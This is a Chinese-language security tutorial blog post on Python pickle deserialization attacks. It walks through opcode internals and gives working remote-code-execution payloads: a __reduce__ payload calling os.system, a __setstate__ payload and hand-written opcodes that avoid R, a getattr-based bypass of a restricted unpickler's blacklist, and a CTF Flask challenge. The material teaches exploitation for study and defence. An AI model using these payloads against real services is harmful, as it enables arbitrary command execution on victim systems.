首发于

网安之路

序列化与反序列化安全问题问题学习(中)-Python

Eki

A Dreamer of Dreams

Python中原生提供了Pickle库来实现对象的序列化和反序列化。与前两篇中提及的语言不同的是。Pickle有堆栈机制,完全可以看作一种独立的语言,通过编写opcode可以执行python代码、覆盖变量等操作,导致pickle解析能力大于pickle生成能力,直接编写的opcode灵活性比使用pickle序列化生成的代码更高,有的代码不能通过pickle序列化得到。这也就带来了更为多变的攻击手段。

0x01 Pickle

Pickle简介

Python中提供了Pickel库用来序列化和反序列化数据,同时通过pickeltools,我们可以方便地对Pickel序列化的数据进行调试。

举一个简单的例子来说明

class Student():
    def __init__(self) -> None:
        self.name = \'Eki\'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'

import pickle
import pickletools

raw = pickle.dumps(Student(),protocol=3)

raw = pickletools.optimize(raw)

print(raw)
\'\'\'
\\x80\\x03c__main__\\nStudent\\n)\\x81}(X\\x04\\x00\\x00\\x00nameX\\x03\\x00\\x00\\x00EkiX\\x05\\x00\\x00\\x00gradeX\\x04\\x00\\x00\\x002021ub.
\'\'\'

pickletools.dis(raw)

\'\'\'
    0: \\x80 PROTO      3
    2: c    GLOBAL     \'__main__ Student\'
   20: )    EMPTY_TUPLE
   21: \\x81 NEWOBJ
   22: }    EMPTY_DICT
   23: (    MARK
   24: X        BINUNICODE \'name\'
   33: X        BINUNICODE \'Eki\'
   41: X        BINUNICODE \'grade\'
   51: X        BINUNICODE \'2021\'
   60: u        SETITEMS   (MARK at 23)
   61: b    BUILD
   62: .    STOP
highest protocol among opcodes = 2
\'\'\'

res = pickle.loads(raw)

print(res)

可以看到Pickle是通过一系列的指令(opcode)来序列化和反序列化对象的。其中分为不同的Pickle协议版本,可以通过pickle.dumps(protocol=x)来指定。pickletools.dis可以帮助我们理解生成的pickle字节流,显示对应的指令作用。比如开始的\\x80后跟的3了pickle的版本。

为了实现自定义反序列化,pickle还提供了一个钩子函数__reduce__, __reduce__被定义之后,当对象被Pickle时就会被调用。它要么返回一个代表全局名称的字符串,Pyhton会查找它并pickle,要么返回一个元组。这个元组包含2到5个元素,其中包括:一个可调用的对象,用于重建对象时调用;一个参数元素,供那个可调用对象使用;被传递给 __setstate__ 的状态(可选);一个产生被pickle的列表元素的迭代器(可选);一个产生被pickle的字典元素的迭代器(可选)


class Evil():
    def __init__(self) -> None:
        self.whatever = "whatever"
    def __reduce__(self) -> Union[str, Tuple[Any, ...]]:
        return os.system,(cmd,)

\'\'\'
b\'\\x80\\x03cposix\\nsystem\\nX\\x02\\x00\\x00\\x00id\\x85R.\'
    0: \\x80 PROTO      3
    2: c    GLOBAL     \'posix system\'
   16: X    BINUNICODE \'id\'
   23: \\x85 TUPLE1
   24: R    REDUCE
   25: .    STOP
\'\'\'

可以看到我们重载__reduce__序列化数据完全改变了,甚至与Evil这个类没啥关系。其中OpcodeR的作用与object.__reduce__()关系密切:选择栈上的第一个对象作为函数、第二个对象作为参数(第二个对象必须为元组),然后调用该函数。其实R正好对应object.__reduce__()函数, object.__reduce__()的返回值会作为R的作用对象,当包含该函数的对象被pickle序列化时,得到的字符串是包含了R的。

也就是说在这里我们相当于执行了posix system,参数为(id)

再来看一个经典的例子,通过Pickle反序列化覆盖全局变量

我们很容易想到与前文类似的方法通过exec命令执行的方式覆盖

import pickle

key = b\'eki\'
class A(object):
    def __reduce__(self):
        return (exec,("key=b\'jacey\'",))

a = A()
pickle_a = pickle.dumps(a)
print(pickle_a)
pickle.loads(pickle_a)
print(key)

但是如果题目直接禁止了Reduce的使用,比如过滤R

import pickle
import base64
import pickletools


class Student():
    def __init__(self,name:str,garade:str) -> None:
        self.name = name
        self.grade = garade
    def __eq__(self, o: object) -> bool:
        return type(o) is Student and \\
            self.name == o.name and \\
            self.grade == o.grade

import secret
\'\'\'
name = "Jacey"
grade = "2019"
\'\'\'

def check(data:bytes)->str:
    if b\'R\' in data:
        return \'no reduce!\'
    x = pickle.loads(data)
    print(secret.name,secret.grade)
    if(x != Student(secret.name,secret.grade)):
        return  \'Not equal\'
    return \'well done!\'


payload =b"""\\x80\\x03
c
__main__\\n
secret\\n
}
(
Vname\\n
Veki\\n
Vgrade\\n
V2019\\n
u
b
0
c
__main__\\n
Student\\n
)
\\x81
}
(
Vname\\n
Veki\\n
Vgrade\\n
V2019\\n
u
b
.
""".replace(b"\\n\\n",b"^^").replace(b"\\n",b"").replace(b"^^",b"\\n")

pickletools.dis(payload)


print(check(payload))

这种情况下,通过c__main__.secret引入这一个module,把一个dict压进栈,内容是{'name': 'rua', 'grade': 'www'},执行BUILD指令,会导致改写__main__.secret.name__main__.secret.grade ,至此secret.namesecret.grade已经被篡改成我们想要的内容

更进一步的,如果R被过滤了,还能实现命令执行吗

class _Unpickler:
    def load_build(self):
        stack = self.stack
        state = stack.pop()
        inst = stack[-1]
        setstate = getattr(inst, "__setstate__", None)#此处获取inst的__setstate__函数,如果存在,那么下面调用该函数
        if setstate is not None:
            setstate(state)
            return
        slotstate = None
        if isinstance(state, tuple) and len(state) == 2:
            state, slotstate = state
        if state:
            inst_dict = inst.__dict__
            intern = sys.intern
            for k, v in state.items():
                if type(k) is str:
                    inst_dict[intern(k)] = v
                else:
                    inst_dict[k] = v
        if slotstate:
            for k, v in slotstate.items():
                setattr(inst, k, v)
    dispatch[BUILD[0]] = load_build

那么有

import pickle
import pickletools

class Student():
    def __init__(self) -> None:
        self.name = \'Eki\'
        self.grade = "2021"
    def __repr__(self) -> str:
        return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'

payload = b"""\\x80\\x03
c
__main__\\n
Student\\n
)
\\x81
}
(
V__setstate__\\n
c
os\\n
system\\n
u
b
Vls /\\n
b
.""".replace(b"\\n\\n",b"^^").replace(b"\\n",b"").replace(b"^^",b"\\n")

pickletools.dis(payload)

res = pickle.loads(payload)

通过设置inst__setstate__我们也可以进行RCE

调试opcode的一些工具

除了自己手写Pickle的Opcode以外,我们也可以利用一些工具进行辅助,比如

相当于手写pickle opcode的辅助工具

Example:

from PickleBuilder import PickleBuilder

p = PickleBuilder()

p.push_mark()
p.push_str("echo eki")
p.load_inst("os","system")

print(pickle.loads(p.compile()))

通过AST解析类python代码生成对应pickle

Example:

class Student():
    def __init__(self) -> None:
        self.name = \'Eki\'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'

payload = """student = OBJ(GLOBAL(\'__main__\', \'Student\'))
student.name = \'Eki\'
student.grade = \'2022\'
return student
"""

from pickle import loads
from pker import cons

#print(cons(payload))

print(loads(cons(payload)))

再看RCE

通过对opcode进行分析,我们可以发现与函数执行相关的opcode有三个: Rio ,以及之前提到的__setstate__覆盖导致的RCE,所以我们可以从四个方向进行构造:

  1. R[callable] [tuple] R调用一个callable对象
b\'\'\'cos
system
(S\'whoami\'
tR.\'\'\'
  1. ii[module]\\n[callable]\\n 相当于c和o的组合,先获取一个全局函数,然后寻找栈中的上一个MARK,并组合之间的数据为元组,以该元组为参数执行全局函数(或实例化一个对象)
(S\'whoami\'
ios
system
.\'\'\'
  1. oMARK [callable] [args...] o 同INST,参数获取方式由readline变为stack.pop而已
(cos
system
S\'whoami\'
o.
  1. b: 根据Unpickler类的代码,再load_build过程中也就是在b操作码执行过程中,如果存在自定义的__setstate__,则会进入
     def load_build(self):
         stack = self.stack
         state = stack.pop()
         inst = stack[-1]
         setstate = getattr(inst, "__setstate__", None)#此处获取inst的__setstate__函数,如果存在,那么下面调用该函数
         if setstate is not None:
             setstate(state)
             return
    

所以可以通过构造__setstate__来进行任意函数执行。但是这种方法需要一个可用的类。

\\x80\\x03c__main__
Student
)\\x81}(
V__setstate__
cos
system
ubVls /
b.

缓解策略/绕过手段

首先能一种简单粗暴的方法是ban了所有可能导致RCE的opcode,也即上面提到的i,o,R,b,但是很显然b是肯定没法ban的,因为正常反序列化也需要他,而i,o,R这几个误伤也比较大。

第二种缓解策略是通过重写Pickle的find_class限制能调用的模块

比如下面

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {\'eval\', \'exec\', \'execfile\', \'compile\', \'open\', \'input\', \'__import__\', \'exit\', \'map\'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global \'%s.%s\' is forbidden" % (module, name))
def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()

然而通过getattar方法我们可以轻松绕过限制

from pker import cons
payload = """getattr = GLOBAL(\'builtins\', \'getattr\')
dict = GLOBAL(\'builtins\', \'dict\')
dict_get = getattr(dict, \'get\')
globals = GLOBAL(\'builtins\', \'globals\')
builtins = globals()
__builtins__ = dict_get(builtins, \'__builtins__\')
eval = getattr(__builtins__, \'eval\')
eval(\'__import__("os").system("whoami")\')
return
"""

payload = cons(payload)
loads(payload)

相当于

builtins.dict.get(builtins.globals(),\'__builtins__\').eval(\'__import__("os").system("whoami")\')

即通过builtins拿到新的builtins绕过限制

例题

巅峰极客2021 线上赛 opcode

from flask import Flask
from flask import request
from flask import render_template
from flask import session
import base64
import pickle
import io
import builtins

class Student():
    def __init__(self) -> None:
        self.name = \'Eki\'
        self.grade = "2019"
    def __repr__(self) -> str:
        return f\'Type:{type(self)} name:{self.name} grade:{self.grade}\'

class RestrictedUnpickler(pickle.Unpickler):
    blacklist = {\'eval\', \'exec\', \'execfile\', \'compile\', \'open\', \'input\', \'__import__\', \'exit\', \'map\'}
    def find_class(self, module, name):
        if module == "builtins" and name not in self.blacklist:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global \'%s.%s\' is forbidden" % (module, name))

def loads(data):
    return RestrictedUnpickler(io.BytesIO(data)).load()


app = Flask(__name__)

app.config[\'SECRET_KEY\'] = "y0u-wi11_neuer_kn0vv-!@#se%32"

@app.route(\'/admin\', methods = ["POST","GET"])
def admin():
    if(\'{}\'.format(session[\'username\'])!= \'admin\' and str(session[\'username\'] , encoding = "utf-8")!= \'admin\'):
        return "not admin"
    try:
        data = base64.b64decode(session[\'data\'])
        if "R" in data.decode():
            return "nonono"
        loads(data)
    except Exception as e:
        print(e)
    return "success"

@app.route(\'/login\', methods = ["GET","POST"])
def login():
    username = request.form.get(\'username\')
    password = request.form.get(\'password\')
    imagePath = request.form.get(\'imagePath\')
    session[\'username\'] = username + password
    session[\'data\'] = base64.b64encode(pickle.dumps(\'hello\' + username, protocol=0))
    try:
        f = open(imagePath,\'rb\').read()
    except Exception as e:
        f = open(\'static/image/error.png\',\'rb\').read()
    imageBase64 = base64.b64encode(f)
    return render_template("login.html", username = username, password = password, data = bytes.decode(imageBase64))

@app.route(\'/\', methods = ["GET","POST"])
def index():
    return render_template("index.html")
if __name__ == \'__main__\':
    app.run(host=\'0.0.0.0\', port=\'8888\')

值得一提的是除了pickle.loadpython其他模块也能触发pickle反序列化漏洞。

例如:numpy.load()会先尝试以numpy自己的数据格式导入;如果失败,则尝试以pickle的格式导入,触发pickle反序列化

0x02 PYAML

https://github.com/bit4woo/code2sec.com/blob/master/Python%20PyYAML%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%AE%9E%E9%AA%8C%E5%92%8Cpayload%E6%9E%84%E9%80%A0.md

PyYAML https://xz.aliyun.com/t/7923

0xFF 参考资料

Pickle官方文档 https://docs.python.org/zh-cn/3/library/pickle.html

从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 https://zhuanlan.zhihu.com/p/89132768

pickle反序列化初探 https://xz.aliyun.com/t/7436

发布于2021-10-04 12:50:55
+14赞
0条评论
收藏
内容需知
  • 投稿须知
  • 转载须知
  • 官网QQ群8:819797106
  • 官网QQ群3:830462644(已满)
  • 官网QQ群2:814450983(已满)
  • 官网QQ群1:702511263(已满)
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 360网络攻防实验室 安全客 All Rights Reserved 京ICP备08010314号-66